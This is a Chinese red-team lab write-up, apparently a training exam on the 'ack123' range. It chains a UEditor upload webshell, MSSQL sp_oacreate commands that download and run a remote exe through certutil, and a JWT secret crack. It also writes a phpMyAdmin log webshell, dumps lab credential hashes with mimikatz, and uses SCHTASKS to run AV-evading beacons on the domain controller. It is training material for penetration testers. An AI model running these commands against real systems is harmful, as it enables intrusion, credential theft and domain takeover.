九月红队考核 ack123靶场第一篇

  • A+
所属分类:安全文章



暗月九月红队考核ack123靶场第一篇

九月红队考核 ack123靶场第一篇
暗月渗透测试培训出师靶场的第一篇
九月出师人数共七人
 共七篇文章 目前第一篇
九月红队考核 ack123靶场第一篇
1
主要考点

1.站库分离 外网打点
2.过360全家桶
3.过windwos defender
4.过火绒
5.内网漫游
6.多层网络渗透
7.横向渗透
8.jwt token密钥破解
9.权限提升
10.域渗透
11.phpmyadmin写shell
12.sqlserver 提权
每三个月一次考核,每个项目根据当前流行的技术进行适当的调整。

项目综合考核渗透测试能力,培养单兵作战的安全选手。

拓扑图

九月红队考核 ack123靶场第一篇

2
培训

需要渗透测试培训 欢迎添加好友咨询


九月红队考核 ack123靶场第一篇


3
考核过程

Web-1

扫描目录有admin/ 目录可以访问,随便注册一个账号先登录看看

九月红队考核 ack123靶场第一篇

经过测试,里面的上传点都不能用,最后在百度UEDITOR1.4.3这个编辑器有个上传getshell的漏洞

https://www.cnblogs.com/sup3rman/p/13071382.html

但是对应的文件没有扫出来,去网上下载HDHCMS源码找到对应位置

九月红队考核 ack123靶场第一篇

存在此漏洞,开始构造上传页面,并且制作好图片马上传

九月红队考核 ack123靶场第一篇

得到返回的路径

九月红队考核 ack123靶场第一篇

然后用蚁剑连接

九月红队考核 ack123靶场第一篇

上传cs马上线,使用fscan扫描内网

九月红队考核 ack123靶场第一篇

九月红队考核 ack123靶场第一篇

发现一台192.168.22.168192.168.22.133,其中168是有web服务的,1331433端口MSSQL

之前在HDHCMS源码中发现了连接数据库的信息

九月红队考核 ack123靶场第一篇

挂上代理访问一下mssql,登陆成功

九月红队考核 ack123靶场第一篇


Data-1

在网上找到一篇利用sp_oacreate传入文件并运行的文章

开启sp_oacreate

exec sp_configure 'show advanced options', 1;  RECONFIGURE;  execsp_configure 'Ole Automation Procedures', 1;  RECONFIGURE;


九月红队考核 ack123靶场第一篇

利用sp_oacreate构造语句,将certutil.exe复制到c:windowstemp下,并重命名为sethc.exe

declare@o int exec sp_oacreate 'scripting.filesystemobject', @o out execsp_oamethod @o, 'copyfile',null,'C:WindowsSystem32certutil.exe','c:windowstempsethc.exe';


九月红队考核 ack123靶场第一篇


在服务器上开启http服务,然后使用命令远程下载exe文件:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output execsp_oamethod @shell,'run',null,'C:WindowsTempsethc.exe -urlcache-split -f "http://ip:port/b.exe" C:WindowsTempshell.exe'


九月红队考核 ack123靶场第一篇

然后运行上线

Declare@runshell INT Exec SP_OACreate 'wscript.shell',@runshell out ExecSP_OAMeTHOD @runshell,'run',null,'forfiles /c shell.exe';


九月红队考核 ack123靶场第一篇


Web-2

挂上代理访问一下192.168.22.168

九月红队考核 ack123靶场第一篇

使用

proxychains dirsearch -u http://192.168.22.168:80

扫一波目录

九月红队考核 ack123靶场第一篇

访问一下,像是数据库日志文件,并且还有其他路径,继续访问

九月红队考核 ack123靶场第一篇

最后到anyue.php就结束了,此时的想法是找地方进行注入

九月红队考核 ack123靶场第一篇

看了下路径,使用的phpstudy_pro,尝试访问phpmyadmin,发现没有,本地搭了一下环境,发现phpmyadmin版本是4.8.5

九月红队考核 ack123靶场第一篇

将目录改为phpmyadmin4.8.5访问

九月红队考核 ack123靶场第一篇

此时不知道账号密码,看看主页有什么

九月红队考核 ack123靶场第一篇

登陆成功后也没有东西,F12看看,有个X-token,看样子像是base64加密,解密看看

九月红队考核 ack123靶场第一篇

九月红队考核 ack123靶场第一篇

Type类型为jwt,网上搜一搜,下载软件进行爆破

九月红队考核 ack123靶场第一篇

密钥为Qweasdzxc5

用这个密钥去登录phpmyadmin

九月红队考核 ack123靶场第一篇

开启日志功能并写入一句话

show variables  like  '%general%';SET GLOBAL general_log='on'SET GLOBAL general_log_file='C:/phpStudy_pro/www/anyue.php'SELECT '<?php eval($_POST["cmd"]);?>'


九月红队考核 ack123靶场第一篇

用蚁剑连接

九月红队考核 ack123靶场第一篇

Cs设置转发上线

使用fscan收集信息,有2台主机,一台16server-dc1,一台12server-data2

九月红队考核 ack123靶场第一篇

九月红队考核 ack123靶场第一篇


16server-dc1

收集域信息

ack123.com


Authentication Id :0 ; 291191 (00000000:00047177)Session           :Batch from 0User Name         :AdministratorDomain            :12SERVER-WEB2Logon Server      :12SERVER-WEB2Logon Time        :2021/9/19 9:45:01SID               :S-1-5-21-4196482953-4248243098-766450032-500msv :[00010000]CredentialKeys* NTLM     :b78ee36a79ed9763b66519f86825a6bd* SHA1     :589865e8a1f5f68ceffcfd5fad8382a8db504257[00000003] Primary* Username :Administrator* Domain   :12SERVER-WEB2* NTLM     :b78ee36a79ed9763b66519f86825a6bd* SHA1     :589865e8a1f5f68ceffcfd5fad8382a8db504257tspkg :wdigest :* Username :Administrator* Domain   :12SERVER-WEB2* Password :QWEasd.999kerberos :* Username :Administrator* Domain   :12SERVER-WEB2* Password :(null)ssp :credman :

CN=Administrator,CN=Users,DC=ack123,DC=commysql/16server-dc1.ack123.com

CN=16SERVER-DC1,OU=DomainControllers,DC=ack123,DC=comDfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/16server-dc1.ack123.com

ldap/16server-dc1.ack123.com/ForestDnsZones.ack123.com

ldap/16server-dc1.ack123.com/DomainDnsZones.ack123.com

DNS/16server-dc1.ack123.com

GC/16server-dc1.ack123.com/ack123.com

RestrictedKrbHost/16server-dc1.ack123.com

RestrictedKrbHost/16SERVER-DC1

RPC/fc2c7a98-defb-4143-8052-ec1832c2a8f0._msdcs.ack123.com

HOST/16SERVER-DC1/ACK123

HOST/16server-dc1.ack123.com/ACK123

HOST/16SERVER-DC1

HOST/16server-dc1.ack123.com

HOST/16server-dc1.ack123.com/ack123.com

E3514235-4B06-11D1-AB04-00C04FC2DCD2/fc2c7a98-defb-4143-8052-ec1832c2a8f0/ack123.com

* Username : Administrator

* Domain : 16SERVER-DC1

* NTLM : bc23a1506bd3c8d3a533680c516bab27

ldap/16SERVER-DC1/ACK123

ldap/fc2c7a98-defb-4143-8052-ec1832c2a8f0._msdcs.ack123.com

ldap/16server-dc1.ack123.com/ACK123

ldap/16SERVER-DC1

ldap/16server-dc1.ack123.com

ldap/16server-dc1.ack123.com/ack123.com

CN=krbtgt,CN=Users,DC=ack123,DC=comkadmin/changepw

CN=12SERVER-DATA2,CN=Computers,DC=ack123,DC=comWSMAN/12server-data2

WSMAN/12server-data2.ack123.com

RestrictedKrbHost/12SERVER-DATA2

HOST/12SERVER-DATA2

RestrictedKrbHost/12server-data2.ack123.com

HOST/12server-data2.ack123.com

CN=12SERVER-WEB2,CN=Computers,DC=ack123,DC=comTERMSRV/12SERVER-WEB2

TERMSRV/12server-web2.ack123.com

WSMAN/12server-web2

WSMAN/12server-web2.ack123.com

RestrictedKrbHost/12SERVER-WEB2

HOST/12SERVER-WEB2

RestrictedKrbHost/12server-web2.ack123.com

HOST/12server-web2.ack123.com




获取域控NTML

bc23a1506bd3c8d3a533680c516bab27

九月红队考核 ack123靶场第一篇

然后访问试试

shell dir 10.10.10.135C$ -u administrator-p [email protected]!

九月红队考核 ack123靶场第一篇


传入马然后用定时任务运行

shell SCHTASKS/Create /S 16server-dc1.ack123.com /U Administrator /P "[email protected]!"/SCONCE /ST 16:37:01/TN 777 /TR c: beacon.exe /RU Administrator


data-2

同样方法

将免杀马传上去

shell copy qq.exe10.10.10.136C$


然后运行免杀马

shell SCHTASKS/Create /S 12SERVER-DATA2.ack123.com /U Administrator /P "[email protected]!"/SC ONCE /ST 17:32:01 /TN 777 /TR c:qq.exe /RU Administrator



九月红队考核 ack123靶场第一篇

4
关注公众号

本公众号长期更新安全类技术文章 欢迎关注和转发



相关推荐: 再见了 Docker!K8S 已成气候!

身为让容器应用实现大规模工业生产的一大功臣,过去几年,Kubernetes  势头迅猛,BAT、京东、美团、字节都走上了全域容器化部署以及云原生架构的康庄大道。 美团技术团队云原生演进之路 如果你认为 Docker 和 Kubernetes…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: